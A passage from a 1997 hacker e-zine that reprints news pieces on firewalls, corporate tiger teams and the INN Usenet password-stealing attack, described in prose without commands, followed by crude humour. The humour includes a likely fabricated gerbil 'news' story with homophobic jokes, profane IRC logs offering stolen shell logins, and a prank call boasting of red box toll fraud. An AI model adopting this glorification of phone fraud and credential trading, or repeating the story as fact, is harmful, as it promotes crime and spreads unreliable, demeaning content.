unaware of the bug. "The Shockwave team are now in investigation mode in full 
force," she said. "We'd really like the opportunity to verify this, and then 
offer insight or solution if applicable," she said. 

Netscape could not be reached for comment. 

�1993-97 Wired Ventures, Inc.
_____________________________________________________________

 H.323: It's 'Open Sesame' in Firewall Speak
 by Kurt Opprecht 

 7:30pm 7.Mar.97.PST -- Corporate firewalls, electronic fortresses that 
 safeguard company secrets, may soon let their guard down a little to allow 
 Internet telephony to seep through - that is, if everyone involved speaks 
 the same language. 

An industry group led by Intel and Cisco Systems on Thursday completed an 
Internet video telephone call through a corporate firewall, a procedure they 
say did not compromise the overall security of the network. 

The group said this development will make possible multimedia support in 
applications like email. 

What made the demonstration possible was the use of H.323, an Internet 
communications standard for audio and video telephony, said Milind Khare, 
product manager in Intel's architecture labs. 

With widespread use of this lingua franca in firewall networking and 
telephony technologies, all systems should be secure. If a packet speaks 
H.323, then the firewall supporting the protocol will recognize it as an 
Internet phone call and let it pass into the network. But a packet that 
doesn't use H.323 will not be allowed inside. 

Still, the notion that a firewall will let some forms of outside 
communications into a network could be a little disconcerting to corporate 
netizens. Nonetheless, Khare said the prospects for mischievous and malicious 
attacks, including spoofed packets masquerading as Internet phone calls, are 
not possible. 

"As far as we know, [H.323 communications] are not spoofable. Hypothetically, 
if you could spoof them, you could do nothing more than conduct an Internet 
phone call," Khare said. 

Security experts concurred that this allowance represents little compromise 
to a corporate network. "Any time you open up a new service that allows any 
type of data through, that poses a risk," said Eugene Spafford, professor of 
computer science at Purdue University. 

The problem, Spafford maintains, is that too many people think of a firewall 
as an all-in-one fix to security problems. "It's like saying, if we put a 
fence around the building with a guard at the gate we'll never have to worry 
about security. That's ridiculous," he said. 
  
�1993-97 Wired Ventures, Inc.
_____________________________________________________________ 
 
 Go Ahead, Be Paranoid : Hackers Are Out to Get You 
 March 17, 1997  
 By STEVE LOHR
 
In a chilly, windowless room in a New York suburb, four men are tapping 
furiously at their laptop computers. Their mission: to crack into the 
computer system of a major U.S. corporation. 

Things seem to be going well, for them. "All right, we're through the 
firewall," announced one bearded hacker. A few moments later, a second 
practitioner of high-tech mischief pronounced himself pleased by what he saw 
inside -- a digital picture of vulnerability rendered by the lines of 
computer code dancing across his screen. "Looks like we can toast it," he 
said. 

  Charles Palmer, a slender, bearded 40-year-old computer scientist, looked 
  on with pride at the members of his team. Skilled hackers, Palmer noted, 
  are scarce these days, at least ones that he will hire. 

"It's hard to find good people in this field who do not have criminal 
records," he explained. 

Palmer and his team work for IBM, and their brand of computer hacking is 
legal. Companies pay the IBM squad to attack their computer systems to test 
how well they can stand up to the increasing assaults by real hackers. 

The growing ranks of cyber intruders are engaged in everything from snooping 
around to "parking" pornography and pirated software on unsuspecting 
corporate machines to computer-assisted fraud and theft. 

White-hat hackers, like those at IBM, are only one kind of computer-security 
professional whose skills are much in demand today. 

Once an arcane specialty, computer security has moved into the mainstream. As 
companies rush onto the Internet, they benefit from improved communication 
with customers, suppliers and far-flung employees, but they also take on far 
greater risk that their corporate computer systems will be breached by 
outsiders with malicious intent. 

The dangers of a networked world have created boom times for 
computer-security consultants, auditors, cryptographers and others. Now they 
must contend with pushy headhunters as well as hackers. Five years ago, 
six-figure salaries were rare in the security field. Today it is not uncommon 
for skilled computer-security veterans to be making $200,000 a year or more. 

Recognizing a seller's market for computer-security expertise, Wietse Venema 
has come to the United States, and he's selling. A computer scientist from 
the University of Eindhoven in the Netherlands, Venema is the co-author of 
Satan, a sophisticated software program intended to find security flaws in 
any computer system linked to the Internet. 

The 45-year-old Dutch researcher is considering offers from IBM and other 
leading American computer companies. "Many people are interested in my 
capabilities now," he observed cheerfully. 

Experts like Venema are suddenly stars because corporations are spending 
more on computer security. This year, companies worldwide are expected to 
spend $6.3 billion on security for their computer networks, estimates 
Dataquest, a market-research firm. 

Within three years the security price tag is projected to more than double to 
nearly $12.9 billion -- a figure that is only for services supplied by 
outside contractors, so it excludes spending on in-house staff, security 
software or hardware products. 

The industry in the United States, the world leader in computer security, is 
composed of hundreds of companies. They run the gamut from large companies 
with worldwide computer consulting practices, like IBM, Science Applications 
International Corp. and Perot Systems, and Big Six accounting firms, like 
Coopers & Lybrand, Ernst & Young and Deloitte & Touche, down to one-man 
independent consultants, like Seiden. 

Fueling the surge in computer-security spending is fear. The corporate 
concerns are heightened with every report of hackers defacing well-known 
World Wide Web sites, like the recent attacks on the sites of the CIA and the 
Department of Justice. 

  The FBI says few intrusions into corporate computer systems -- 15 percent 
  at most -- are reported to law-enforcement agencies. But the handful that 
  are reported, like the 1994 case of Russian hackers who tapped into 
  Citibank and made $10 million in illegal fund transfers (all but $400,000 
  was recovered), tend to cause alarm. 

"The business is not so much network security as it is network insecurity," 
noted Alice Murphy, an analyst at Dataquest. "There's so much anxiety out 
there now." 

Just how great the threat is to corporate computer systems is a matter of 
debate. The Internet, observes Peter Neumann, a computer scientist at SRI 
International, a research group in Menlo Park, Calif., was never really 
designed to be secure. 

Once the bailiwick of a small community of researchers, it is starting to be 
used as a freeway of commerce. "The infrastructure is vulnerable," Neumann 
said. "From that larger perspective the risks are enormous." 

Dan Farmer, the co-author of Satan with the Dutch researcher Venema, did a 
survey of 1,700 corporate and government Web sites late last year and found 
that more than 60 percent of them had "serious potential security 
vulnerabilities." 

Farmer, a programmer at Sun Microsystems Inc., did not break into the 
computer systems, but he said they were open to attack and often could be 
severely damaged. (His survey results are posted on the Web.) 

Yet there is a significant difference, some analysts say, between potential 
vulnerability and the actual business risk to corporate computer systems. 
"There is risk, but the threat tends to be vastly overstated," said George 
Colony, president of Forrester Research Inc., a consulting firm in Cambridge, 
Mass. 

Forrester estimates that losses from fraud in Internet commerce are likely to 
be roughly $1 for every $1,000 of business. To put the matter into 
perspective, the fraud losses in cellular phone service are $20 for every 
$1,000, according to Forrester, while the losses on credit-card transactions 
are nearly $2 for every $1,000 of goods charged. 

Still, even skeptics, like Forrester's Colony, agree that computer security 
requires continuous attention. "It is a manageable risk, and it should not 
deter companies from jumping into Internet commerce," Colony said. "But I 
also tell our clients that they should think of computer security as a 
guerrilla war that will last forever." 

The FBI is treating the battle against computer crime as a long-running 
campaign. All new agents are now trained in cyberspace investigations as part 
of the curriculum at the FBI Academy in Quantico, Va. And last year the 
bureau established three computer-crime squads in San Francisco, New York 
and Washington, to pursue cybercrime more aggressively. 

"We're really on the cusp of this becoming a major problem," said James 
Kallstrom, head of the FBI office in New York. "As more and more of the 
economy goes digital, there are huge incentives for criminal attacks on 
American corporations." 

Computer crime, of course, comes in many forms. An employee with a grudge and 
access to a company's computer network may well be far more dangerous, and 
costly, than even the most artful hacker. 

A survey released two weeks ago by the Computer Security Institute, and 
conducted on behalf of the FBI's computer-crime unit, estimated computer 
security losses last year at $100 million -- a total only among some 250 
companies and organizations that would place dollar figures on their losses 
from fraud, theft of trade secrets and other breaches. 

The criminal hackers have long been engaged in a kind of cat-and-mouse game 
with law-enforcement agencies and private computer-security experts. And that 
game is increasingly being played at a higher level, with greater skill and 
new tools. 

The cell-phone hackers of the past, who electronically jimmied phones for the 
thrill and free phone service, have graduated to Web-site hacking. 

Today there are an estimated 440 hacker bulletin boards, 1,900 Web sites 
purveying hacking tips and tools, and 30 hacker publications like "Phrack"
and "2600: The Hacker Quarterly." There are readily available software 
programs for hacking tactics like "war dialing," "sniffing" and "fingering" 
-- all used to exploit security weaknesses in computer systems. 
[Hacker publications? Oh no! Evil knowledge spreaders!]
"As the stakes become higher, the technical sophistication of the people 
doing this kind of illegal activity is increasing," said Edward Hart, a 
senior vice president of Science Applications International. 

Today there is a brisk illicit market in hacking, according to security 
experts, with the street price for breaking into a corporate Web site 
typically in the $8,000-to-$10,000 range. Bonus payments are usually demanded 
for trade secrets pilfered or damage inflicted on a competitor's computer 
system. 

Limiting the risk, and damage, to corporate computer systems is the goal of 
Palmer and the other security specialists at IBM. The test hacking done by
his team is mainly a fact-finding tool, and only one of many. 

The authorized break-ins by these groups, called "tiger teams," are often 
more valuable as a marketing tactic than as a research tool. Thick and 
exhaustive studies of a company's computer security can be met with yawning 
indifference by top executives, but a break-in gets their attention. 

Mundane rules, not high-tech wizardry, are crucial to reducing security 
risks. A robust firewall to filter what electronic traffic gets into a 
company's computer system is helpful, but it can be a Maginot Line approach 
to security -- the real weaknesses are elsewhere. 

To work from home, employees may have dial-up modems at their desks, 
unprotected by firewalls or even passwords. Employees, security experts warn, 
must be told to give their passwords to no one; one scam is for hackers to 
call new employees, pretending to be members of the corporate technology 
staff doing a check of passwords. Another frequent weakness is simple 
physical security, watching who goes in or out of the building. 

These are hectic times for security consultants like IBM's Nick Simicich, a 
44-year-old self-taught programmer. He works from his home in Boca Raton, 
Fla., equipped with powerful computers running Linux, a shareware program 
that is the operating system of choice for hackers. 

Mostly, though, Simicich is on the road -- 85 percent of the time, he 
estimates -- logging perhaps 150,000 air miles a year. Continental, the 
airline he flies most regularly, invited Simicich to a company parade last 
year. 

He proudly calls himself a "paid professional paranoid." His goal, he says, 
is not to make corporate computer systems immune to hackers. "That's 
impossible," he explained. "Our real goal is to raise the bar. First, we do 
want to make it harder for them to break in, so the average hacker moves to 
an easier target. Second, when they do get in, we want to ensure that the 
damage is limited." 

�1997 The New York Times 
_____________________________________________________________
 
 Threat of 'techno' terrorism being explored  
 Air travel, stock trading among potential targets  
 March 18, 1997
 
 SAN FRANCISCO (CNN) -- Last year, a tree fell across a power line in 
 Wyoming, causing a rippling blackout across nine Western states.  

 Now, security experts are wondering if a computer hacker could throw a 
 virtual tree -- a disruptive computer message -- across the nation's 
 communication lines, causing a meltdown of vital information systems.  

"The telephone system, the public switch network, is vulnerable," says 
Clinton Brooks of the National Security Agency, who serves on a presidential 
panel looking at ways to outsmart potential hackers.  

Also on Brooks' litany of potential targets: The air traffic control system, 
stock exchanges, the Defense Department, the Federal Reserve, the IRS and 
Social Security.  

And he says many other information systems that deliver basic needs to people 
in their daily lives are also subject to attack -- traffic lights, banking 
systems and ATM and credit card networks.  

Dangers and defenses:

In October, the Commission on Critical Infrastructure Protection is set to 
issue a report on the possible dangers of such cyber terrorism. The 
commission's goal is to predict the targets, anticipate the methods that 
might be used and figure out defenses.   "We need to all be slightly 
paranoid, and it's good to start thinking this way about the threats -- the 
inside and the outside threats," says Ron Skelton of the Electric Power 
Research Institute, an organization of electric utilities.   

The stakes are high. For example, air traffic controllers, linked 
electronically, escort plane loads of passengers from city to city. Since the 
days of the telegraph, railroads have used remote data to safely shuttle 
trains from track to track. If those systems are compromised, trains and 
planes could crash.  

"We have identified more than 100 foreign nations" capable of "information 
warfare," Brooks says.  

Basic steps can counter threat 

Brooks wants a centralized national reporting agency to monitor the risks and 
coordinate reactions. And he says it should be established sooner rather than 
later.  

In the meantime, some of the early solutions to cyber terrorism appear to be 
fairly basic:   Separate systems. Air traffic controllers use at least three 
independent systems, instead of a single system, to land a plane. Isolate 
circuits. Data at the San Francisco command center of Pacific Gas and 
Electric runs down private lines that do not go through hacker-accessible 
telephone switching systems, as voice calls do. Encrypt data. This is 
particularly useful in situations where redundant systems or isolated 
circuitry isn't feasible.  

"Encryption is probably the single most powerful tool that we could employ to 
protect ourselves in cyberspace," says Jim Bidzos of RSA Data Security.  

San Francisco bureau chief Greg Lefevre contributed to this report.
_____________________________________________________________

Usenet Servers under Assault
Michael Stutz <stutz@dsl.org>
6:04pm 17.Mar.97.PST

One of the largest automated attacks against Internet servers since 1988 
began Saturday and continued into Monday. Attacks on Monday marked the sixth 
attempt at cracking potentially thousands of Usenet news servers, after four 
such attacks on Saturday and one on Sunday.

Utilizing a well-known bug in InterNetNews server (INN), a complete and very 
popular Usenet news server package, an unidentified party posted four Usenet 
control messages on Saturday that mail copies of the password file and other 
information about a system.

 Saturday's attacks mailed the files to a machine in Europe owned by IBM. 
 However, messages on Sunday and Monday were sent to different addresses - a 
 machine at Rice University and a corporate machine in Germany. The message 
 headers were spoofed so that they appeared to have originated from David C. 
 Lawrence, a well-known Usenet administrator who oversees the creation of 
 hierarchies.

The attack works by gaining access to a news server via a hole in INN. The 
<http://www.isc.org/inn.html> hole affects all versions of INN up to 1.5. INN 
1.5.1, distributed since December 1996, remains unaffected. Patches are 
available from James Brister at the Internet Software Consortium, where INN 
is maintained. Brister concurred that the bug is nothing new, saying that the 
fixes have been available for some time. These attacks succeeded because not 
all news administrators have updated their systems.

Matt Power, a post-doctoral associate at MIT, had written a patch that fixes 
the security hole, originally making it public two years ago. "I finally got 
them to include it in the distribution last December," he said.

"The [attacker's] script copies the system's password file along with four 
other files and emails them to a remote address," said Power. With 
<ftp://ftp.cert.org/pub/tools/crack> easily obtained software, the attacker 
could then attempt to crack one-way encrypted Unix user passwords with brute 
force. The other files - the system's inetd.conf file and output of the 
"uname" and "who" commands - could provide valuable information to hack the 
system in other ways, Power said.

The bug involved was just recently reported in a CERT 
<ftp://info.cert.org/pub/cert_advisories/CA-97.08.innd> advisory dated 
20 February - presumably long enough for the cracker to have exploited it but 
possibly not long enough for news administrators to have fixed their 
software.

Smaller or understaffed operations, where sysadmins may 
not have yet heard of the bug or implemented the fix, are especially 
vulnerable.

Power likens this sort of attack to one of the Net's most notorious and 
widespread attacks. "It is rare to hear of a successful attempt to automate 
the penetration of [probably] thousands of servers throughout the Internet," 
he said in an email to Wired News. "I don't know of any similar event that 
has taken place since the Robert T. Morris Internet worm of 2 November 1988."

�1993-97 Wired Ventures, Inc.
_____________________________________________________________
 
 Usenet News Servers Take a Beating
 by Michael Stutz 

 7:59pm 18.Mar.97.PST -- The bombardment of Usenet news servers across the 
 Internet that began Saturday continued Tuesday, and while a student at Rice 
 University had been identified in connection with the attacks, it was not 
 yet known whether this was a prank or if the attacker had malicious intent. 

The machines were attacked via a well-known hole in the interpretation of 
Usenet control messages, which normally send information to individual news 
servers. The hole exploited a bug in popular news server software that 
allowed the messages to contain commands to be executed on the news server 
machine. 

Though the hole is a known bug with a published fix, a great deal of machines 
have been compromised. Many Usenet administrators may still be unaware of the 
problem. CERT, the Computer Emergency Response Team, issued a special 
bulletin Tuesday to reach more administrators. 

"At this time [Monday], 40 sites were known to have been compromised," said 
CERT's Terence McGillen. "As of [Tuesday], that number is up to 130. Right 
now, the CERT team is working in real time with administrators at the 
affected sites. As the days go on this week, we'll post updates as to the 
activity - it may die down, or it may not." 

McGillen was reluctant to speculate on the identity of the perpetrator. "We 
don't focus on that," he said. "We're not concerned in who the intruders were 
- just in the means they used to attack the sites." 

The attack emailed a machine's encrypted password file and other sensitive 
information to a remote address - one of which had been an obviously hacked 
account at Rice University in Houston, Texas. 

Officials at Rice University said they had found their man. "We do know who 
it is and will be taking appropriate steps," said Kathryn Costello, a 
university vice president. "We caught him thanks to all of the security 
measures we had implemented - it was a good test case for us, actually. We 
knew what terminal he was working at and were able to quickly identify him." 
His name has not been released. 

"The Rice news server was the point of attack," Costello said. "This could 
not have affected other university data because it is a standalone system 
kept separate from the rest of our computing facilities," she said. 

There has been no reported further compromise to these systems as a result of 
attack, but some administrators tested the security hole in question, causing 
more of the system-cracking control messages to be broadcast to all of 
Usenet's servers. 

One of those additional messages was possibly from another "real" attacker, 
said David C. Lawrence, the news administrator whose email identity was 
spoofed by the cracker. 

"[While] several later attacks were really administrators who let their 
well-meaning tests escape to the world, a couple of attacks have not yet been 
classified; at least one of them looks more like a real copycat attack than 
an innocent mistake." 

In order to gain unauthorized access to any of the attacked systems, the 
cracker would first have to run software to break the password information. 
So far, no administrators are aware of any such further compromise on their 
systems. 

"I have talked to several dozen sites at this point, well over a hundred," 
said Lawrence. "None have yet reported any additional compromise stemming 
from this attack. A significant factor in this is that the password file 
delivery destination machines in the original attack - two hosts in IBM 
Sweden's network - were unreachable from pretty much the time that the attack 
began," he said. 

Speaking of the possible copycat attack, Lawrence said it was too early to 
speculate whether the person would receive anything he could use before being 
nabbed, anyway. "First he has to break some passwords, then he has to contact 
the machine that has the account for the broken password, if he can get past 
their firewall and any additional security guards in place," he said. 

Things could have been worse. While these attacks seem to be just mailing a 
copy of the password file to an outside email address - presumably to be 
later cracked with brute force - virtually any system command could be 
performed, including the erasing of system data. This is clearly a serious 
hole. 

"It was characterized as an attack on the infrastructure, which I would say 
is serious," said McGillen. "This problem has been around for a while, it's 
just that [network administrators at these sites] are swamped with work. We 
don't expect this to go away overnight." 
  
�1993-97 Wired Ventures, Inc.
_____________________________________________________________

[Article provided by Keystroke]
Man waits 20 years for phone line but dies before getting it

BUCHAREST, Romania (AP) -- Romanians are used to waiting a long time for a 
telephone. But 20 years for a dialtone was too long for Constantin Coltea.
Coltea, who died last year, applied for a telephone line in 1977. The state 
telephone company, Romtelecom, responded this month, according to the 
Evenimentul Zilei daily.

In its letter, Romtelecom told Coltea to confirm within 15 days that he still 
wanted the line or his request would be dropped. Coltea's 81-year-old widow, 
Caliopi, said she no longer can afford it, living on a $14 monthly pension.

Lidia Toboc, a Romtelecom spokeswoman, could not confirm Coltea's case, but 
said there were two cases a year ago involving applicants who waited 15 years 
for their service.

Since then, she said, "our management has been trying to resolve long-delayed 
applications."

Bribes of up to several hundred dollars are common in Romania to get a line 
installed more swiftly. The government plans to privatize 30 percent of the 
phone company.
_____________________________________________________________

[This editorialised article is courtesy of ec|ipse & Keystroke, they don't 
know who it was that added the top 10 list.  I know this has nothing to do
with hacking, phreaking, etc, but it's too damn funny not to publish.]

Subject: Only in California... (fwd)
You wanted raunchy?  You got it!...times three!
Here's one for the archives... 
This is an actual article from the LA Times:
 
"In retrospect, lighting the match was my big mistake.  But I was only trying 
to retrieve the gerbil," Eric Tomaszewski told bemused doctors in the Severe 
Burns Unit of Salt Lake City Hospital.  Tomaszewski and his homosexual 
partner Andrew "Kiki" Farnum had been admitted for emergency treatment after 
a felching session had fone seriously wrong.  "I pushed a cardboard tube up 
his rectum and slipped Raggot, our gerbil, in," he explained.  "As usual, 
Kiki shouted out 'Armageddon', my cue that he'd had enough.  I tried to 
retrieve Raggot but he wouldn't come out again, so I peered into the tube and 
struck a matche, thinking the light might attract him."  At a hushed press 
conference, a hospital spokesman described what happened hext.  "The match 
ignited a pocket of intestinal gas and a flame shot out of the tube, igniting 
Mr. Tomaszewski's hair and severely burning his face.  It also set fire to 
the gerbil's fur and whiskers which in turn ignited a larger pocket of gas 
further up the intestine, propelling the rodent out like a cannonball."  
Tomaszewski suffered second degree burns and a broken nose from the impact of 
the gerbil, while Farnum suffered first and second degree burns to his anus 
and lower intestinal tract. 

OK, here's the top ten things that scare me the most in reading this story: 
10. "I pushed the cardboard tube up his rectum..."  Ouch!!! 
9.  "So I peered into the tube..." Aaaaaaahhhhhh!  I'm sorry, but that's like 
looking through a telescope into Hell.  I'd rather use binoculars to stare at 
the sun. 
8.  That poor gerbil (who obviously suffers from low self-esteem) being shot 
out of the guy's anus like Rocky the Flying Squirrel on Rocky and Bullwinkle. 
7.  Suffering a broken nose from a gerbil being launched out of someone's 
anus.  I'm just guessing, but I seriously doubt said gerbil was springtime 
fresh after his little journey into Kiki's 'tunnel of love'. 
6.  People walking around with these volcanic-like pockets of gas in their 
rectums. 
5.  People who do this kind of thing and then admit what they were doing when 
taken to the emergency room.  Sorry, but I think I would have made up a story 
about a gang of roving, pyromaniac, anal sex fiends breaking into my house 
and sodomizing me with a charcoal lighter before I admitted the truth.  Call 
me old fashioned, but I just can't imagine looking at a doctor and saying, 
"Well Doc, it's like this.  See, we have this gerbil named Raggot and we took 
this cardboard tube..." 
4.  "First and second degree burns to the anus".  Wouldn't this make the 
burning itch and discomfort of hemorrhoids a welcome relief?  How does one 
ever take a healthy poop after something like that?  And the smell of burning 
anus must be in the top five most horrible scents on the face of God's green 
earth. 
3.  People name "Kiki" which is obviously a Polynesian word for 'idiotic 
white men who insert rodents up their butts.' 
2.  What kind of a hospital would hold a press conference on this?? 
1.  This happened in Salt Lake City.  What kind of people are those Mormons??  
(I'm starting to get a whole new image of the Osmond family)
_____________________________________________________________

�1997 HAVOC Bell Systems Publishing
No part of this publication may be reproduced in whole or in part without the 
expressed written consent of HAVOC Bell Systems Publishing. [Unless you're
leet, then it's ok.  Well, just so long as you don't plain copy the zine.  If
you wanna take this to the copy center and blow it up and put in on the
ceiling above your bed, we're not gonna try and stop you.]
_____________________________________________________________

                              -------------------
                             --=[Reader Survey]=--
                          The HAVOC Technical Journal 
                              -------------------
                                
[This survey is designed to help us better suit our magazine to the reader, 
or we may just be trying to get a good laugh, but we haven't decided yet.]

Name:                          M/F:   Age:    Occupation/grade:     
City: 
State:
Zip Code:
Country: 
Area Code:
SSN: [reference purposes only ;)]
Why are you reading this?

Where'd you get it?

I am into: [ ] Hacking [ ] Phreaking [ ] Cracking [ ] Warez [ ] Coding (any)
           [ ] Anarchy [ ] Carding [ ] Law enforcement [ ] Public education 

I am guilty of the following:

[ ] Eating paint chips
[ ] Being the leader of a cult of programmers who intend to commit suicide
[ ] Posession or intent to distribute THTJ
[ ] A misdemeanor (if so, describe)
[ ] A felony (if so, describe)
[ ] Physically attacking bell employees
[ ] Working for a phone company

On a scale of 1 - 10, with 10 being leet, 0 being lame, I am best described 
as: 
[Send all replies to mazer@cycat.com]
_____________________________________________________________                                

                                --------------
                               --=[IRC logs]=--
                          Humorous adventures in IRC
                                --------------


> is this a sex channel ?
<ReD_dAwG> but the new one will be a package deal
<WyzeOne> Uuuh, one 9-gig drive is not good

#freebsd unable to rejoin channel (you're banned!)
_____________________________________________________________

[This could very well be the definition of 'AOL lamer' used in Webster's, 
courtesy of Scud-O.]

<xHoTiCeX> CuM On BiAtCh!
<xHoTiCeX> U wAnT Me TO PulL ThE InSiDe HaCk?
<Scud-O> I SAID NO 3reet teXt f00l
<xHoTiCeX> BiTcH
<Scud-O> gee you are erret.... hackers2
<xHoTiCeX> CuM On BiTcH, Do U WaNT tO danCe?
<Scud-O> disco?
<xHoTiCeX> U rEaLlY aRe A dUmb PiEcE Of ShIt ArEn'T U?
<Scud-O> no you are
<Scud-O> you just got taken over fool
<xHoTiCeX> So
<xHoTiCeX> DoNt CaRe AbOuT tHaT sHitTy ChAnNeL
<Scud-O> why the FUCK do you keep mixing caps?
<xHoTiCeX> AlL I CaRe AbOuT Is FuCkInG U uP!
<Scud-O> go ahead
<Scud-O> what you got you little warez puppy?
<xHoTiCeX> EvEr BeEn On AoL LamMah?
<Scud-O> nuke.exe?
<Scud-O> no... but i think you have
<xHoTiCeX> SaTaN
<Scud-O> you know ANY thing about ip?
<Scud-O> satan? you dumb ass... satan is a prog fro cracking 
hosts
<Scud-O> dumb fuck
<Scud-O> what is a routing table?
<xHoTiCeX> Im In WpSx BiTcH aNd U ArE On SoMe ShItTy ChAnNeL 
loOkS lIke U dA dUmB aSs
<Scud-O> excuse me? cant tell what ya wrote with all those 
ereet typing skills
<xHoTiCeX> SaTaN iS tHe UlTiMaTe HaCkInG tOol DuMbAsS!
<xHoTiCeX> Ha LaMaH
<xHoTiCeX> U DoNt KnOw ShIt
<Scud-O> NO YOU dont know shit
<Scud-O> who wrote satan then?
<xHoTiCeX> ThAtS sOmEtHiN To Be PrOuD Of Huh?
<xHoTiCeX> DuMb FuCk
<Scud-O> WHO WROTE IT?
<Scud-O> btw, the boys in #hackers are loving this 
conversation
<xHoTiCeX> ReAl Ppl DoNt GivE NaMes DumB FuCk
<xHoTiCeX> R u ThAt sTuPiD?
<xHoTiCeX> HeH LaMah!
<Scud-O> you havcent even USED satan have you?
<xHoTiCeX> YeS I hAvE 
<Scud-O> WHO WROTE IT?
<xHoTiCeX> KnOw OnE KnOwS WhO wRoTe It LitTle ShIt
<Scud-O> you are a dumb fuck.. go ask someone ya lammah
<xHoTiCeX> AlRiGht ThEn SmArT aSs WhO WrOtE It?
<Scud-O> dan farmer
<xHoTiCeX> AlRiGhT sO Who Did SmArT Ass
<xHoTiCeX> Fuck OFf
<xHoTiCeX> u SoMe LiTtLe NeRd ThAt DoeSnT KnOw ShIt BiTcH
<Scud-O> no
<Scud-O> im the fuckin football captian
_____________________________________________________________

[This log was provided by Keystroke from an incident shortly after TiSDaL had
taken over the channel #-=|\|E\\'B|ES=-.]

<Loom> age/sex check
<TiSDaL> 14

<TecHnoKiD> give me ops!!!!!!!!

<TiSDaL> nice bots
<TiSDaL> clones even
<TecHnoKiD> or i'll take them with my army!!!!
<TiSDaL> wanna watch em all ping out?
<TecHnoKiD> no not really
<TiSDaL> take me baby
<Loom> come on Tisdal give him ops
<TiSDaL> rape me 
<TiSDaL> rape me and my phriend

<TiSDaL> damn bot's in the wrong channel

<TiSDaL> lol
<TiSDaL> see what that gets ya
_____________________________________________________________

[This log courtesy of Redtyde from #stupid.]

<JG> watch youf fuckin mouth redtyde, that inappropriate for this channel
<JG> alright.. why were the blond girl's titties square?
<JG> because she forgot to take the tissues out of the box first
<Skip> uh ah
<JG> HAhaHAhaHHaHaHaHhAhaHAhH
<JG> holy shit that was hilarias!
_____________________________________________________________

[Log of a conversation over getting ops in #phreak.]
<|-A|pHa-|> hello
> hi
<|-A|pHa-|> do you need any shellz
<|-A|pHa-|> i can you over a hundred shells 
<|-A|pHa-|> with the pw's
<|-A|pHa-|> under one condition
> wassat?
<|-A|pHa-|> y'all gimme ops
> well, that's against company policy
> hold on, i'll talk to my manager and see what i can do
<|-A|pHa-|> ok
<|-A|pHa-|> also t offer i have a fserve
> he says i don't get paid enough to do that
> oh, ok what's on it?
<|-A|pHa-|> and a web page
<|-A|pHa-|> with the anarchist cookbook as a link.
<|-A|pHa-|> also how to make bongs
<|-A|pHa-|> and other pot smokin apartues
> ok lemme relay this to the boss
<|-A|pHa-|> um...NRA
<|-A|pHa-|> alsp
<|-A|pHa-|> also
<|-A|pHa-|> and bass fishin links
<|-A|pHa-|> mirc scripts
<|-A|pHa-|> how to hack links
> i don't see how he can turn this down
> but he says our status quo would be in jeopardy, what's that mean?
<|-A|pHa-|> i dunno
<|-A|pHa-|> but relay the other stuff thats on my page to him
<|-A|pHa-|> on my fserve i have mirc scripts,doom special edition,descent
<|-A|pHa-|> um..
<|-A|pHa-|> programs for computers
<|-A|pHa-|> irc programs
> he's gonna have to talk to the regional manager, i had our secretary write 
  it all down though, it sounds like a great deal in my opinion
<|-A|pHa-|> ok thanx
<|-A|pHa-|> if i have to go soon i will come back later for the answer
> cool beans
_____________________________________________________________

[IRC quote of the month]

<ec|ipse> poof puts the "cocksucking moron" back in "cocksucking moron"
_____________________________________________________________
                            
                            ----------------------
                           --=[Funny Phonecalls]=--
                          The HAVOC Technical Journal
                            ----------------------

[This is from a conversation between Scud-O and an AT&T ISP operator, which
took place after Scud forgot his password.  AT&T uses 'security words' to 
verify that you are who you say you are, and Scud's was 'fuck you'.]

<ATT> Sir I'm gonna need your security word.
<Me>  My security word?  Well, that would be FUCK YOU!
<ATT> Uhh... correct... here is your password, and you need to change your
      security word sir, it's offensive.
<Me>  Oh yeah?  Well fuck you! <click>
_____________________________________________________________

[_Electro_ made this call during lunchtime at school, and I believe the 
cafeteria food had sufficiently intoxicated him.]

<Op> BC Tel Operator, How May I Help You?
<Me> Yes, Hi.  How are you doing today?
<Op> Fine Thanks, How Can I help you?
<Me> Well I was gonna pay with my calling card, but I can't seem to find it.
     Would you like me to insert a coin instead?
<Op> Yes go ahead, insert your quarter.
<Me> No prob (I PLAY MY RED BOX TONES WITHOUT PUTTING IN 5 CENTS FIRST)
<Op> I am sorry sir you aren't putting in real coins
<Me> Hmmm. . .Yes, But. . . enough about me, lets talk about you
<Op> Excuse me?
<Me> So how's life?  How are the kids?  Oh Yeah, Can You tell me whats wrong 
     with my red box?
<Op> Very Funny. . . <Click>
_____________________________________________________________

[This interesting conversation occurred took place between shoe and the local
bell operator.]

<Op> YES?  BELL SOUTH HERE!  WE ARE SMART AND NOW ONLY HAVE 4 FONES IN THIS 
     CITY THAT PEOPLE CAN REDBOX!
<Me> Uhh, ok.  Quit yelling I gotta ask you somethin.
<Op> Go on...
<Me> I need the number for Cuntflex.
<Op> Excuse me?
<Me> You heard me, Cuntflex.
<Op> That number would be 581-FUCK-YOU
<Me> Are you sure?  I tried that and got your house.
<Op> <click>

[Well, ok it didn't all happen, but he did ask her that, and she did give him
that number.]
_____________________________________________________________                           
     
     ------------------------                  ----------------------
    --=[HAVOC Bell Systems]=--                --=[Acknowledgements]=--
     ------------------------                  ----------------------
                                      
Agrajag   : PLA Michigan                 btm       : Elite 
darkcyde  : #phreak old-schooler         digipimp  : Co-conspirator
Digital_X : Nemesis                      dr1x      : Perverted bastard
disc0re   : Distributor                  ec|ipse   : Hysterical bastard
Keystroke : Submissions Editor           Jisa      : She's just a girl
KungFuFox : Acting Editor                RBCP      : Funniest man alive
memor     : Ueberleet French phreak      shoelace  : Kewl fellow, #phreak'er
psych0    : Writer                       WeatherM  : Pan1k's right hand man
REality   : #phreak's southern accent    yesimlame : No, he's not
Redtyde   : #phreak not so old-schooler  #phreak   : My home on IRC
Scud-O    : Mighty Editor in Chief       Everyone who I get along with.
theLURK3R : Coder guru                   
UnaBomber : Tired of IRC                 
_____________________________________________________________

This Month's Question: If a phreak calls from the forest, and nobody's around
to keep him out of trouble, what're the odds that the call will be free?

[The HAVOC Research Department of HAVOC Bell Systems has determined that 
there is a 90% chance that it will be.  What about the other 10%, you may be 
wondering?  Smokey the Bear fights more than fires, he's with the Gestapo.]
_____________________________________________________________

Next Month:
[My crystal ball is currently being refurbished, and cannot predict what is 
to come in THTJ10.  Stay tuned for further details as they emerge.]
                           Issue 10 is out May 1st!

 Send all articles for issue 10 to Keystroke at: keystroke@thepentagon.com
                               
          ==========================================================
          = Is this copy of The HAVOC Technical Journal skunked?   =
          = If this file doesn't read at 165968 bytes, it probably = 
          = doesn't have a born on date! Get a fresh copy from our = 
          = site at: http://www.geocities.com/SiliconValley/8805/  =
          ==========================================================
        
                                  --=[EOF]=--